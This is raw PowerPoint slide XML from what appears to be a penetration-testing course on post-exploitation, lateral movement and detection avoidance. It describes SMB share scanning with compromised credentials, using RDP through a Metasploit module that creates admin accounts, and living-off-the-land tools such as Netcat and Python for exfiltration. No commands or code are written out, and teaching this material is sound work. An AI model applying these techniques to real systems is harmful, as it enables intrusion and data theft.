                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>You can scan for SMB shares that you may be able to log in to with compromised credentials or that the logged-in user of the compromised system may have access to. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>You can move files to or from other systems. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Alternatively, you can instantiate an SMB share (via Samba or similar mechanisms) and copy files from a compromised system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>You can use remote access protocols, including the following, to communicate with a compromised system:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Microsoft’s Remote Desktop Protocol (RDP)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Apple Remote Desktop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>VNC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>X server forwarding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>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dirty="0"/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35427004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Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="386033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Post-Exploitation Scanning (Cont.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3297F28A-E2DC-E27F-573A-C52AC74E7990}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2824" y="993321"/>
            <a:ext cx="868212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Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>The figure below shows an example of using Metasploit to create an RDP connection. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="CaixaDeTexto 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D44B3B63-E54B-AB27-075B-21C2B5708A70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5648" y="1674448"/>
            <a:ext cx="4665709"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Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>This Metasploit module enables RDP and provides options to create an account and configure it to be a member of the Local Administrators and Remote Desktop Users group. ​</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" rtl="0">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>This module can also be used to forward the target’s TCP port 3389.​</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Imagem 8" descr="Tela de computador com texto preto sobre fundo branco&#10;&#10;Descrição gerada automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84A80049-B65C-6166-973F-7DE8B0EB5907}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5152126" y="1734079"/>
            <a:ext cx="3767586" cy="2484067"/>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dirty="0"/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21072327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Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="386033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Post-Exploitation Scanning (Cont.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3297F28A-E2DC-E27F-573A-C52AC74E7990}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2824" y="993321"/>
            <a:ext cx="868212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400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Remote Desktop’s main advantage over other tools, like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Sysinternals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, is that it gives you a full, interactive GUI of the remote compromised computer. </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>From the remote connection, it is possible to steal data or collect screenshots, disable security software, or install malware. </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Remote Desktop connections are fully encrypted, and monitoring systems cannot see what you are doing in the remote system. </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The main disadvantage of Remote Desktop is that a user working on the compromised remote system may be able to detect that you are logged on to the system. </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>A common practice is to use Remote Desktop when no users are on the compromised system or when compromising a server.</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400">
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>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dirty="0"/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28188483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Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="386033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Legitimate Utilities and Living-off-the-Land</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3297F28A-E2DC-E27F-573A-C52AC74E7990}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2824" y="993321"/>
            <a:ext cx="8682127"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400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Many different legitimate Windows legitimate utilities, such as PowerShell, Windows Management Instrumentation (WMI), and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Sysinternals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, can be used for post-exploitation activities. </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Similarly, you can use legitimate tools and installed applications in Linux and macOS systems to perform post-exploitation activities. </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>If a compromised system has Python installed, for example, you can use it for additional exploitation and exfiltration. </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Similarly, you can use the Bash shell and tools like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> post-exploitation.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>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dirty="0"/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3869398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Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="386033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Legitimate Utilities and Living-off-the-Land (Cont.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
